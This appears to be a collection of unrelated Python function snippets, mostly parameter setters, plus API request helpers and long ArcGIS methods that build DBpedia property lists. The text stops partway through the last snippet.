"def set_params(self,**kwargs):\n for key in kwargs:\n setattr(self, key, kwargs[key])",
"def set_params(self, *arg):\n pass",
"def _generate_params(self):\n return {\n 'lis_outcome_service_url': self.lis_outcome_service_url,\n 'lis_result_sourcedid': self.lis_result_sourcedid,\n 'oauth_consumer_key': self.key\n }",
"def set_params(self, state_dicts):\n raise NotImplementedError",
"def set_parameters(self, **kwargs):\n self.__select_k_best.set_params(**kwargs)",
"def __init__(self, apikey, providerkey = None):\n self.apikey = apikey\n \n # Set User-Agent\n self.headers = {'User-Agent': \"Prowlpy/%s\" % str(__version__),\n 'Content-type': \"application/x-www-form-urlencoded\"}\n\n # Aliasing\n self.add = self.post",
"def define_parameters(self):",
"def set_params(self, **kwargs):\n\n kw_keys = list(kwargs)\n\n if 'alpha' in kw_keys:\n self.alpha = kwargs['alpha']\n\n if 'beta' in kw_keys:\n self.beta = kwargs['beta']\n\n if 'gamma' in kw_keys: \n \tself.gamma = kwargs['gamma']\n\n if 'epsilon' in kw_keys:\n self.epsilon = kwargs['epsilon']\n \n self.nact = self.highbound-self.lowbound\n self.actions = np.arange(self.nact)",
"def set_hyperparams(self, params):",
"def set_params(self, params: Dict):\n\n if params['training_instances'] is not None:\n self.training_instances = params['training_instances']\n if params['n'] is not None:\n self.n = params['n']\n if params['lda'] is not None:\n self.lda = params['lda']\n if params['verbose'] is not None:\n self.verbose = params['verbose']\n\n self.num_features = self.training_instances[0].get_feature_count()\n self.w = None\n self.b = None",
"def _set_params(self,x):\r\n self.k._set_params(x)",
"def updateParameters(self):\n\n return",
"def __init__( self, parameters={} ):\n self.params = {}",
"def _update_params(self):\n raise NotImplementedException()",
"def init_params(self):\n blah",
"def set_search_params(self, **kwargs):\n self._search_params = kwargs",
"def set_params(self, **params):\n return super().set_params(**params)",
"def _set_parameter(self):\n # Get parameter keys\n self.input_parameter = self.parameter_combobox.currentText()\n self.result_parameter = self.result_parameters[self.input_parameter]\n # Adjust axes labels\n self.ax.set_xlabel('{} steunpunt'.format(self.input_parameter))\n self.ax.set_ylabel('{} uitvoerlocatie'.format(self.input_parameter))\n # Set data\n self._set_data()",
"def updateParameters(self, parameters):",
"def set_query_string(self):\n\n if self.search_by == 'by-postal-code':\n self.querystring = {'postalCode': self.search_input, 'countryCode': \"US\"}\n else :\n self.querystring = {'city': self.search_input}",
"def setup_params(self, response):\n self.login_url = self.login_handler.login_url\n ((self.region_id, self.region),) = response[\"region\"].items()\n self._host = \"{}.{}\".format(self.region_id, BLINK_URL)\n self._token = response[\"authtoken\"][\"authtoken\"]\n self._auth_header = {\"Host\": self._host, \"TOKEN_AUTH\": self._token}\n self.urls = BlinkURLHandler(self.region_id, legacy=self.legacy)\n self.networks = self.get_networks()\n self.client_id = response[\"client\"][\"id\"]\n self.account_id = response[\"account\"][\"id\"]",
"def set_params(self, **params):\n\n return super().set_params(**params)",
"def _set_params(self,x):\r\n self.k1._set_params(x[:self.k1.num_params])\r\n self.k2._set_params(x[self.k1.num_params:])",
"def _set_params(self,x):\r\n self.k1._set_params(x[:self.k1.num_params])\r\n self.k2._set_params(x[self.k1.num_params:])",
"def setupParameters(self, **pars):\n \n seldict = {}\n for k,v in pars.items():\n if v != None and v != \"\":\n seldict[k] = v\n \n return seldict",
"def __init__(self, *args, **kwds):\n if args or kwds:\n super(ModifyParametersResponse, self).__init__(*args, **kwds)",
"def yelp_search_biz(term: str = None, location: str = None,\n latitude: float = None,\n longitude: float = None,\n url_params: Dict = None) -> Dict:\n params = url_params.copy() if url_params else {}\n if not (location or (latitude and longitude)):\n raise ValueError(\"Either location or coordinates is required.\")\n if term:\n params['term'] = term.replace(' ', '+')\n if latitude and longitude:\n latitude = float(latitude)\n longitude = float(longitude)\n if latitude < -90 or latitude > 90 or longitude < -180 or longitude > 180:\n raise ValueError(\"Invalid latitude or longitude.\")\n params['latitude'] = latitude\n params['longitude'] = longitude\n if location:\n params['location'] = location.replace(' ', '+')\n return request_external(YELP_API_HOST,\n YELP_SEARCH_PATH, YELP_API_KEY,\n url_params=params)",
"def set_parameters(self, population_size=40, num_tests=5, num_searches=5, num_searches_best=5, num_enabled=17,\n bonus1=10, bonus2=1, local_searches=(mts_ls1, mts_ls2, mts_ls3), **kwargs):\n super().set_parameters(population_size=kwargs.pop('population_size', population_size), **kwargs)\n self.num_tests = num_tests\n self.num_searches = num_searches\n self.num_searches_best = num_searches_best\n self.num_enabled = num_enabled\n self.bonus1 = bonus1\n self.bonus2 = bonus2\n self.local_searches = local_searches",
"def set_params(self, **kwargs):\n for key, value in kwargs.items():\n if key in self.params.keys():\n self.params[key] = value\n else:\n raise KeyError",
"def request_from_yelp(host, path, bearer_token, url_params=None):\n url_params = url_params or {}\n url = '{0}{1}'.format(host, quote(path.encode('utf8')))\n headers = {\n 'Authorization': 'Bearer %s' % bearer_token,\n }\n\n\n response = requests.request('GET', url, headers=headers, params=url_params)\n\n return response.json()",
"def doParametersOfInterest(self):\n\n self.modelBuilder.doVar(\"Rdy[1.,0.0,10.0]\");\n self.modelBuilder.doVar(\"Rqcd[1,0.0,10.0]\");\n self.modelBuilder.doSet(\"POI\",\"Rdy,Rqcd\")",
"def __init__(self, api, geo, query):\n self.api = api\n # self.db = db\n self.geo = geo\n self.query = query\n\n # API rate call limit.\n self.limit = 100",
"def params(self,new):\n self._params = new\n self._config_set()\n self._make_model()",
"def set_payment_params(self, **params):\n pass",
"def __init__(self, endpoint='https://www.wikidata.org/w/api.php'):\n self.endpoint = endpoint",
"def test_make_request_params(self):\n\n expected_value = \"token=\"+EVENTBRITE_API_KEY+\"&location.longitude=-122.057403564&location.latitude=37.4192008972&location.within=20mi&page=1&categories=103%2C109&sort_by=date\"\n request_params = {\n \"token\": EVENTBRITE_API_KEY,\n \"location.latitude\": \"37.4192008972\",\n \"location.longitude\": \"-122.057403564\",\n \"location.within\": \"20mi\",\n \"sort_by\": \"date\"\n }\n url_encoded_request_params = _update_urlencode_request_params(\"103,109\", 1, request_params)\n self.assertEqual(expected_value, url_encoded_request_params)",
"def updateParameters(self, parameters):\r\n\t\tin_wikiplace_IRI = parameters[0]\r\n\t\tin_location_property = parameters[1]\r\n\t\tin_relation_degree = parameters[2]\r\n\t\tout_location = parameters[3]\r\n\t\tout_points_name = parameters[4]\r\n\t\t\r\n\t\tif in_wikiplace_IRI.value:\r\n\t\t\tinputFeatureClassName = in_wikiplace_IRI.valueAsText\r\n\t\t\tlastIndexOFGDB = inputFeatureClassName.rfind(\"\\\\\")\r\n\t\t\tfeatureClassName = inputFeatureClassName[(lastIndexOFGDB+1):]\r\n\t\t\tcurrentWorkspace = inputFeatureClassName[:lastIndexOFGDB]\r\n\r\n\t\t\tarcpy.env.workspace = currentWorkspace\r\n\t\t\tout_location.value = currentWorkspace\r\n\r\n\t\t\t# get all the IRI from input point feature class of wikidata places\r\n\t\t\tinplaceIRIList = []\r\n\t\t\tcursor = arcpy.SearchCursor(inputFeatureClassName)\r\n\t\t\tfor row in cursor:\r\n\t\t\t\tinplaceIRIList.append(row.getValue(\"URL\"))\r\n\t\t\t\r\n\t\t\t# get all the property URL which are used in the input feature class. their objects are geographic locations which have coordinates, I call them location common properties\r\n\t\t\tlocationCommonPropertyJSONObj = SPARQLQuery.locationCommonPropertyQuery(inplaceIRIList)\r\n\t\t\tlocationCommonPropertyJSON = locationCommonPropertyJSONObj[\"results\"][\"bindings\"]\r\n\r\n\t\t\tLocationPropertyPath.locationCommonPropertyURLList = []\r\n\t\t\tLocationPropertyPath.locationCommonPropertyCountList = []\r\n\t\t\tfor jsonItem in locationCommonPropertyJSON:\r\n\t\t\t\tLocationPropertyPath.locationCommonPropertyURLList.append(jsonItem[\"p\"][\"value\"])\r\n\t\t\t\tLocationPropertyPath.locationCommonPropertyCountList.append(jsonItem[\"NumofSub\"][\"value\"])\r\n\r\n\t\t\tlocationCommonPropertyCountDict = dict(zip(LocationPropertyPath.locationCommonPropertyURLList, LocationPropertyPath.locationCommonPropertyCountList))\r\n\r\n\t\t\t# get the english label for each location common property\r\n\t\t\tlocationCommonPropertyLabelJSON = SPARQLQuery.locationCommonPropertyLabelQuery(LocationPropertyPath.locationCommonPropertyURLList)\r\n\t\t\t# locationCommonPropertyLabelJSON = locationCommonPropertyLabelJSONObj[\"results\"][\"bindings\"]\r\n\r\n\t\t\t# a dictionary object: key: propertyNameCount, value: propertyURL\r\n\t\t\tLocationPropertyPath.locationCommonPropertyDict = dict()\r\n\t\t\tLocationPropertyPath.locationCommonPropertyNameCountList = []\r\n\t\t\tLocationPropertyPath.locationCommonPropertyURLList = []\r\n\t\t\tLocationPropertyPath.locationCommonPropertyCountList = []\r\n\r\n\t\t\tfor jsonItem in locationCommonPropertyLabelJSON:\r\n\t\t\t\tpropertyURL = jsonItem[\"p\"][\"value\"]\r\n\t\t\t\tLocationPropertyPath.locationCommonPropertyURLList.append(propertyURL)\r\n\r\n\t\t\t\tpropertyName = jsonItem[\"propertyLabel\"][\"value\"]\r\n\r\n\t\t\t\tpropertyCount = locationCommonPropertyCountDict[propertyURL]\r\n\t\t\t\tLocationPropertyPath.locationCommonPropertyCountList.append(propertyCount)\r\n\r\n\t\t\t\tpropertyNameCount = propertyName + \"(\" + propertyCount + \")\"\r\n\t\t\t\tLocationPropertyPath.locationCommonPropertyNameCountList.append(propertyNameCount)\r\n\t\t\t\tLocationPropertyPath.locationCommonPropertyDict[propertyNameCount] = propertyURL\r\n\r\n\t\t\tin_location_property.filter.list = LocationPropertyPath.locationCommonPropertyNameCountList\r\n\r\n\r\n\r\n\r\n\r\n\r\n\t\t\tif in_location_property.value and in_relation_degree.value and out_points_name.valueAsText == None:\r\n\t\t\t\tpropertyName = in_location_property.valueAsText\r\n\t\t\t\trelationdegree = 
in_relation_degree.valueAsText\r\n\r\n\t\t\t\tlastIndex = propertyName.rfind(\"(\")\r\n\t\t\t\tpropertyName = propertyName[:lastIndex]\r\n\r\n\t\t\t\tpropertyName = propertyName.replace(\" \", \"_\")\r\n\r\n\t\t\t\tif featureClassName.endswith(\".shp\"):\r\n\t\t\t\t\tlastIndex = featureClassName.rfind(\".\")\r\n\t\t\t\t\tfeatureClassNameNoShp = featureClassName[:lastIndex]\r\n\t\t\t\t\tout_points_name.value = featureClassNameNoShp + \"_D\" + relationdegree + \"_\" + propertyName + \".shp\"\r\n\t\t\t\telse:\r\n\t\t\t\t\tout_points_name.value = featureClassName + \"_D\" + relationdegree + \"_\" + propertyName\r\n\r\n\r\n\t\t\t\tif arcpy.Exists(out_points_name.valueAsText):\r\n\t\t\t\t\tarcpy.AddError(\"The output feature class name already exists in current workspace!\")\r\n\t\t\t\t\traise arcpy.ExecuteError\r\n\r\n\t\t\t\r\n\r\n\r\n\t\t\tif in_relation_degree.value:\r\n\t\t\t\trelationDegree = int(in_relation_degree.valueAsText)\r\n\t\t\t\tif relationDegree > 4:\r\n\t\t\t\t\tin_relation_degree.value = 4\r\n\r\n\r\n\r\n\r\n\r\n\t\t\t\r\n\r\n\t\treturn",
"def _set_parameters(self, parameters):\n self.parameters = parameters\n self._set_points_and_weights()",
"def set_params(self, **params):\n self.check_params(params)\n self.sk_params.update(params)\n return self",
"def test_search_yelp(self):\n\n resp = self.client.get('/v1/search?location=sf&category=restaurants')\n data = resp.get_json()\n\n self.assertEqual(resp.status_code, 200)\n self.assertIn('businesses', data)",
"def updateParameters(self, parameters):\r\n\t\tin_wikiplace_IRI = parameters[0]\r\n\t\tin_com_property = parameters[1]\r\n\t\tin_boolean_inverse_com = parameters[2]\r\n\t\tin_inverse_com_property = parameters[3]\r\n\t\tin_boolean_isPartOf = parameters[4]\r\n\t\tin_expanded_com_property = parameters[5]\r\n\t\tin_boolean_inverse_expanded_com = parameters[6]\r\n\t\tin_inverse_expanded_com_property = parameters[7]\r\n\t\t# out_location = parameters[2]\r\n\t\t# out_property_table_name = parameters[3]\r\n\t\t# out_com_property_URL = parameters[4]\r\n\r\n\t\tisInverse = False\r\n\r\n\t\tif in_boolean_inverse_com.valueAsText == 'true':\r\n\t\t\tisInverse = True\r\n\t\telif in_boolean_inverse_com.valueAsText == 'false':\r\n\t\t\tisInverse = False\r\n\r\n\r\n\t\tisExpandedPartOf = False\r\n\t\t\r\n\t\tif in_boolean_isPartOf.valueAsText == 'true':\r\n\t\t\tisExpandedPartOf = True\r\n\t\telif in_boolean_isPartOf.valueAsText == 'false':\r\n\t\t\tisExpandedPartOf = False\r\n\r\n\t\tisInverseExpanded = False\r\n\r\n\t\tif in_boolean_inverse_expanded_com.valueAsText == 'true':\r\n\t\t\tisInverseExpanded = True\r\n\t\telif in_boolean_inverse_expanded_com.valueAsText == 'false':\r\n\t\t\tisInverseExpanded = False\r\n\r\n\t\tarcpy.AddMessage((\"in_boolean_isPartOf.valueAsText: {0}\").format(in_boolean_isPartOf.valueAsText))\r\n\r\n\t\tif isInverse == False:\r\n\t\t\tin_inverse_com_property.enabled = False\r\n\t\telse:\r\n\t\t\tin_inverse_com_property.enabled = True\r\n\r\n\r\n\t\tif isExpandedPartOf == False:\r\n\t\t\tin_expanded_com_property.enabled = False\r\n\t\t\tin_inverse_expanded_com_property.enabled = False\r\n\t\telse:\r\n\t\t\tin_expanded_com_property.enabled = True\r\n\t\t\tif isInverseExpanded == False:\r\n\t\t\t\tin_inverse_expanded_com_property.enabled = False\r\n\t\t\telse:\r\n\t\t\t\tin_inverse_expanded_com_property.enabled = True\r\n\r\n\t\tif in_wikiplace_IRI.value:\r\n\t\t\tinputFeatureClassName = in_wikiplace_IRI.valueAsText\r\n\t\t\tarcpy.AddMessage(\"{0}\".format(inputFeatureClassName))\r\n\t\t\t# inputFeatureClass = arcpy.Describe(inputFeatureClassName)\r\n\t\t\tfieldList = arcpy.ListFields(inputFeatureClassName)\r\n\t\t\tisURLinFieldList = False\r\n\t\t\tfor field in fieldList:\r\n\t\t\t\tif field.name == \"URL\":\r\n\t\t\t\t\tisURLinFieldList = True\r\n\r\n\t\t\tif isURLinFieldList == False:\r\n\t\t\t\tarcpy.AddErrorMessage(\"Please a point feature class which include a 'URL' Field for the wikidata IRI of this entity\")\r\n\t\t\t\traise arcpy.ExecuteError\r\n\t\t\telse:\r\n\t\t\t\t# update the output directory of this tool to the same geodatabase \r\n\t\t\t\tlastIndexOFGDB = inputFeatureClassName.rfind(\"\\\\\")\r\n\t\t\t\toutputLocation = inputFeatureClassName[:lastIndexOFGDB]\r\n\t\t\t\t# out_location.value = outputLocation\r\n\r\n\t\t\t\t# get all the IRI from input point feature class of wikidata places\r\n\t\t\t\tinplaceIRIList = []\r\n\t\t\t\tcursor = arcpy.SearchCursor(inputFeatureClassName)\r\n\t\t\t\tfor row in cursor:\r\n\t\t\t\t\tinplaceIRIList.append(row.getValue(\"URL\"))\r\n\r\n\t\t\t\tif len(inplaceIRIList) == 0:\r\n\t\t\t\t\tarcpy.AddMessage(\"Input Feature class do not have record\")\r\n\t\t\t\t\traise arcpy.ExecuteError\r\n\t\t\t\telse:\r\n\t\t\t\t\t# get the direct common property \r\n\t\t\t\t\tcommonPropertyJSONObj = SPARQLQuery.commonPropertyQuery(inplaceIRIList)\r\n\t\t\t\t\tcommonPropertyJSON = commonPropertyJSONObj[\"results\"][\"bindings\"]\r\n\r\n\t\t\t\t\tif len(commonPropertyJSON) == 0:\r\n\t\t\t\t\t\tarcpy.AddMessage(\"No property 
find.\")\r\n\t\t\t\t\t\traise arcpy.ExecuteError\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tLinkedDataPropertyEnrich.propertyURLList = []\r\n\t\t\t\t\t\tLinkedDataPropertyEnrich.propertyNameList = []\r\n\t\t\t\t\t\tLinkedDataPropertyEnrich.propertyURLDict = dict()\r\n\t\t\t\t\t\t# LinkedDataPropertyEnrich.FunctionalPropertySet = Set()\r\n\t\t\t\t\t\t# LinkedDataPropertyEnrich.noFunctionalPropertyURLList = []\r\n\t\t\t\t\t\t# LinkedDataPropertyEnrich.noFunctionalPropertyNameList = []\r\n\t\t\t\t\t\t# LinkedDataPropertyEnrich.noFunctionalPropertyURLDict = dict()\r\n\r\n\t\t\t\t\t\tfor jsonItem in commonPropertyJSON:\r\n\t\t\t\t\t\t\tpropertyURL = jsonItem[\"p\"][\"value\"]\r\n\t\t\t\t\t\t\tif \"http://dbpedia.org/ontology/\" in propertyURL or \"http://dbpedia.org/property/\" in propertyURL:\r\n\t\t\t\t\t\t\t\tif propertyURL not in LinkedDataPropertyEnrich.propertyURLList:\r\n\t\t\t\t\t\t\t\t\tLinkedDataPropertyEnrich.propertyURLList.append(propertyURL)\r\n\t\t\t\t\t\t\t\t\tlastIndex = propertyURL.rfind(\"/\")\r\n\t\t\t\t\t\t\t\t\tpropertyName = propertyURL[(lastIndex+1):]\r\n\t\t\t\t\t\t\t\t\tif \"http://dbpedia.org/ontology/\" in propertyURL:\r\n\t\t\t\t\t\t\t\t\t\tlastIndex = len(\"http://dbpedia.org/ontology/\")\r\n\t\t\t\t\t\t\t\t\t\tpropertyName = propertyURL[lastIndex:]\r\n\t\t\t\t\t\t\t\t\t\tpropertyName = \"dbo:\" + propertyName + \"(\" + jsonItem[\"NumofSub\"][\"value\"] + \")\"\r\n\t\t\t\t\t\t\t\t\telif \"http://dbpedia.org/property/\" in propertyURL:\r\n\t\t\t\t\t\t\t\t\t\tlastIndex = len(\"http://dbpedia.org/property/\")\r\n\t\t\t\t\t\t\t\t\t\tpropertyName = propertyURL[lastIndex:]\r\n\t\t\t\t\t\t\t\t\t\tpropertyName = \"dbp:\" + propertyName + \"(\" + jsonItem[\"NumofSub\"][\"value\"] + \")\"\r\n\t\t\t\t\t\t\t\t\t# propertyName = propertyName + \"(\" + jsonItem[\"NumofSub\"][\"value\"] + \")\"\r\n\t\t\t\t\t\t\t\t\tLinkedDataPropertyEnrich.propertyNameList.append(propertyName)\r\n\t\t\t\t\t\t\t\t# propertyNameURLList.append(propertyURL + \" \" +propertyName)\r\n\t\t\t\t\t\tLinkedDataPropertyEnrich.propertyURLDict = dict(zip(LinkedDataPropertyEnrich.propertyNameList, LinkedDataPropertyEnrich.propertyURLList))\r\n\r\n\t\t\t\t\t\tin_com_property.filter.list = LinkedDataPropertyEnrich.propertyNameList\r\n\t\t\t\t\t\t# in_com_property.filters[0] = LinkedDataPropertyEnrich.propertyNameList\r\n\t\t\t\t\t\t# in_com_property.filter.list = LinkedDataPropertyEnrich.propertyNameList\r\n\t\t\t\t\t\t# in_com_property.filters[0].list = LinkedDataPropertyEnrich.propertyNameList\r\n\t\t\t\t\t\t# in_com_property.filters[1].list = LinkedDataPropertyEnrich.propertyURLList\r\n\t\t\t\t\t\t# arcpy.AddMessage(\"URLLIst: {0}\".format(LinkedDataPropertyEnrich.propertyURLList))\r\n\t\t\t\t\t\t# arcpy.AddMessage(\"NameLIst: {0}\".format(LinkedDataPropertyEnrich.propertyNameList))\r\n\t\t\t\t\t\t# out_com_property_URL.filter.list = LinkedDataPropertyEnrich.propertyURLList\r\n\r\n\t\t\t\t\t# get the inverse direct common property \r\n\t\t\t\t\tif isInverse == True:\r\n\t\t\t\t\t\tinverseCommonPropertyJSONObj = SPARQLQuery.inverseCommonPropertyQuery(inplaceIRIList)\r\n\t\t\t\t\t\tinverseCommonPropertyJSON = inverseCommonPropertyJSONObj[\"results\"][\"bindings\"]\r\n\r\n\t\t\t\t\t\tif len(inverseCommonPropertyJSON) == 0:\r\n\t\t\t\t\t\t\tarcpy.AddMessage(\"No inverse property find.\")\r\n\t\t\t\t\t\t\traise arcpy.ExecuteError\r\n\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\tLinkedDataPropertyEnrich.inversePropertyNameList = []\r\n\t\t\t\t\t\t\tLinkedDataPropertyEnrich.inversePropertyURLList = 
[]\r\n\t\t\t\t\t\t\tLinkedDataPropertyEnrich.inversePropertyURLDict = dict()\r\n\t\t\t\t\t\t\t# LinkedDataPropertyEnrich.propertyURLList = []\r\n\t\t\t\t\t\t\t# LinkedDataPropertyEnrich.propertyNameList = []\r\n\t\t\t\t\t\t\t# LinkedDataPropertyEnrich.propertyURLDict = dict()\r\n\t\t\t\t\t\t\t\r\n\r\n\t\t\t\t\t\t\tfor jsonItem in inverseCommonPropertyJSON:\r\n\t\t\t\t\t\t\t\tpropertyURL = jsonItem[\"p\"][\"value\"]\r\n\t\t\t\t\t\t\t\tif \"http://dbpedia.org/ontology/\" in propertyURL or \"http://dbpedia.org/property/\" in propertyURL:\r\n\t\t\t\t\t\t\t\t\tif propertyURL not in LinkedDataPropertyEnrich.inversePropertyURLList:\r\n\t\t\t\t\t\t\t\t\t\tLinkedDataPropertyEnrich.inversePropertyURLList.append(propertyURL)\r\n\t\t\t\t\t\t\t\t\t\t# lastIndex = propertyURL.rfind(\"/\")\r\n\t\t\t\t\t\t\t\t\t\t# propertyName = propertyURL[(lastIndex+1):]\r\n\t\t\t\t\t\t\t\t\t\tif \"http://dbpedia.org/ontology/\" in propertyURL:\r\n\t\t\t\t\t\t\t\t\t\t\tlastIndex = len(\"http://dbpedia.org/ontology/\")\r\n\t\t\t\t\t\t\t\t\t\t\tpropertyName = propertyURL[lastIndex:]\r\n\t\t\t\t\t\t\t\t\t\t\tpropertyName = \"is dbo:\" + propertyName + \" Of (\" + jsonItem[\"NumofSub\"][\"value\"] + \")\"\r\n\t\t\t\t\t\t\t\t\t\telif \"http://dbpedia.org/property/\" in propertyURL:\r\n\t\t\t\t\t\t\t\t\t\t\tlastIndex = len(\"http://dbpedia.org/property/\")\r\n\t\t\t\t\t\t\t\t\t\t\tpropertyName = propertyURL[lastIndex:]\r\n\t\t\t\t\t\t\t\t\t\t\tpropertyName = \"is dbp:\" + propertyName + \" Of (\" + jsonItem[\"NumofSub\"][\"value\"] + \")\"\r\n\t\t\t\t\t\t\t\t\t\t# propertyName = propertyName + \"(\" + jsonItem[\"NumofSub\"][\"value\"] + \")\"\r\n\t\t\t\t\t\t\t\t\t\tLinkedDataPropertyEnrich.inversePropertyNameList.append(propertyName)\r\n\t\t\t\t\t\t\t\t\t# propertyNameURLList.append(propertyURL + \" \" +propertyName)\r\n\t\t\t\t\t\t\tLinkedDataPropertyEnrich.inversePropertyURLDict = dict(zip(LinkedDataPropertyEnrich.inversePropertyNameList, LinkedDataPropertyEnrich.inversePropertyURLList))\r\n\r\n\t\t\t\t\t\t\tin_inverse_com_property.filter.list = LinkedDataPropertyEnrich.inversePropertyNameList\r\n\r\n\t\t\t\t\tif isExpandedPartOf == True:\r\n\t\t\t\t\t\texpandedCommonPropertyJSONObj = SPARQLQuery.locationDBpediaExpandedCommonPropertyQuery(inplaceIRIList)\r\n\t\t\t\t\t\texpandedCommonPropertyJSON = expandedCommonPropertyJSONObj[\"results\"][\"bindings\"]\r\n\r\n\t\t\t\t\t\tif len(expandedCommonPropertyJSON) == 0:\r\n\t\t\t\t\t\t\tarcpy.AddMessage(\"No expanded property find.\")\r\n\t\t\t\t\t\t\traise arcpy.ExecuteError\r\n\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\t# LinkedDataPropertyEnrich.propertyURLList = []\r\n\t\t\t\t\t\t\t# LinkedDataPropertyEnrich.propertyNameList = []\r\n\t\t\t\t\t\t\t# LinkedDataPropertyEnrich.propertyURLDict = dict()\r\n\t\t\t\t\t\t\t# LinkedDataPropertyEnrich.FunctionalPropertySet = Set()\r\n\t\t\t\t\t\t\tLinkedDataPropertyEnrich.expandedPropertyNameList = []\r\n\t\t\t\t\t\t\tLinkedDataPropertyEnrich.expandedPropertyURLList = []\r\n\t\t\t\t\t\t\tLinkedDataPropertyEnrich.expandedPropertyURLDict = dict()\r\n\r\n\t\t\t\t\t\t\tfor jsonItem in expandedCommonPropertyJSON:\r\n\t\t\t\t\t\t\t\tpropertyURL = jsonItem[\"p\"][\"value\"]\r\n\t\t\t\t\t\t\t\tif \"http://dbpedia.org/ontology/\" in propertyURL or \"http://dbpedia.org/property/\" in propertyURL:\r\n\t\t\t\t\t\t\t\t\tif propertyURL not in LinkedDataPropertyEnrich.expandedPropertyURLList:\r\n\t\t\t\t\t\t\t\t\t\tLinkedDataPropertyEnrich.expandedPropertyURLList.append(propertyURL)\r\n\t\t\t\t\t\t\t\t\t\t# lastIndex = 
propertyURL.rfind(\"/\")\r\n\t\t\t\t\t\t\t\t\t\t# propertyName = propertyURL[(lastIndex+1):]\r\n\t\t\t\t\t\t\t\t\t\tif \"http://dbpedia.org/ontology/\" in propertyURL:\r\n\t\t\t\t\t\t\t\t\t\t\tlastIndex = len(\"http://dbpedia.org/ontology/\")\r\n\t\t\t\t\t\t\t\t\t\t\tpropertyName = propertyURL[lastIndex:]\r\n\t\t\t\t\t\t\t\t\t\t\tpropertyName = \"dbo:\" + propertyName + \"(\" + jsonItem[\"NumofSub\"][\"value\"] + \")\"\r\n\t\t\t\t\t\t\t\t\t\telif \"http://dbpedia.org/property/\" in propertyURL:\r\n\t\t\t\t\t\t\t\t\t\t\tlastIndex = len(\"http://dbpedia.org/property/\")\r\n\t\t\t\t\t\t\t\t\t\t\tpropertyName = propertyURL[lastIndex:]\r\n\t\t\t\t\t\t\t\t\t\t\tpropertyName = \"dbp:\" + propertyName + \"(\" + jsonItem[\"NumofSub\"][\"value\"] + \")\"\r\n\t\t\t\t\t\t\t\t\t\t# propertyName = propertyName + \"(\" + jsonItem[\"NumofSub\"][\"value\"] + \")\"\r\n\t\t\t\t\t\t\t\t\t\tLinkedDataPropertyEnrich.expandedPropertyNameList.append(propertyName)\r\n\t\t\t\t\t\t\t\t\t# propertyNameURLList.append(propertyURL + \" \" +propertyName)\r\n\t\t\t\t\t\t\tLinkedDataPropertyEnrich.expandedPropertyURLDict = dict(zip(LinkedDataPropertyEnrich.expandedPropertyNameList, LinkedDataPropertyEnrich.expandedPropertyURLList))\r\n\r\n\t\t\t\t\t\t\tin_expanded_com_property.filter.list = LinkedDataPropertyEnrich.expandedPropertyNameList\r\n\r\n\r\n\t\t\t\t\t\tif isInverseExpanded == True:\r\n\t\t\t\t\t\t\tinverseExpandedCommonPropertyJSONObj = SPARQLQuery.locationDBpediaInverseExpandedCommonPropertyQuery(inplaceIRIList)\r\n\t\t\t\t\t\t\tinverseExpandedCommonPropertyJSON = inverseExpandedCommonPropertyJSONObj[\"results\"][\"bindings\"]\r\n\r\n\t\t\t\t\t\t\tif len(inverseExpandedCommonPropertyJSON) == 0:\r\n\t\t\t\t\t\t\t\tarcpy.AddMessage(\"No inverse expanded property find.\")\r\n\t\t\t\t\t\t\t\traise arcpy.ExecuteError\r\n\t\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\t\t# LinkedDataPropertyEnrich.propertyURLList = []\r\n\t\t\t\t\t\t\t\t# LinkedDataPropertyEnrich.propertyNameList = []\r\n\t\t\t\t\t\t\t\t# LinkedDataPropertyEnrich.propertyURLDict = dict()\r\n\t\t\t\t\t\t\t\t# LinkedDataPropertyEnrich.FunctionalPropertySet = Set()\r\n\t\t\t\t\t\t\t\tLinkedDataPropertyEnrich.inverseExpandedPropertyNameList = []\r\n\t\t\t\t\t\t\t\tLinkedDataPropertyEnrich.inverseExpandedPropertyURLList = []\r\n\t\t\t\t\t\t\t\tLinkedDataPropertyEnrich.inverseExpandedPropertyURLDict = dict()\r\n\r\n\t\t\t\t\t\t\t\tfor jsonItem in inverseExpandedCommonPropertyJSON:\r\n\t\t\t\t\t\t\t\t\tpropertyURL = jsonItem[\"p\"][\"value\"]\r\n\t\t\t\t\t\t\t\t\tif \"http://dbpedia.org/ontology/\" in propertyURL or \"http://dbpedia.org/property/\" in propertyURL:\r\n\t\t\t\t\t\t\t\t\t\tif propertyURL not in LinkedDataPropertyEnrich.inverseExpandedPropertyURLList:\r\n\t\t\t\t\t\t\t\t\t\t\tLinkedDataPropertyEnrich.inverseExpandedPropertyURLList.append(propertyURL)\r\n\t\t\t\t\t\t\t\t\t\t\t\r\n\t\t\t\t\t\t\t\t\t\t\tif \"http://dbpedia.org/ontology/\" in propertyURL:\r\n\t\t\t\t\t\t\t\t\t\t\t\tlastIndex = len(\"http://dbpedia.org/ontology/\")\r\n\t\t\t\t\t\t\t\t\t\t\t\tpropertyName = propertyURL[lastIndex:]\r\n\t\t\t\t\t\t\t\t\t\t\t\tpropertyName = \"is dbo:\" + propertyName + \" Of (\" + jsonItem[\"NumofSub\"][\"value\"] + \")\"\r\n\t\t\t\t\t\t\t\t\t\t\telif \"http://dbpedia.org/property/\" in propertyURL:\r\n\t\t\t\t\t\t\t\t\t\t\t\tlastIndex = len(\"http://dbpedia.org/property/\")\r\n\t\t\t\t\t\t\t\t\t\t\t\tpropertyName = propertyURL[lastIndex:]\r\n\t\t\t\t\t\t\t\t\t\t\t\tpropertyName = \"is dbp:\" + propertyName + \" Of (\" + jsonItem[\"NumofSub\"][\"value\"] + 
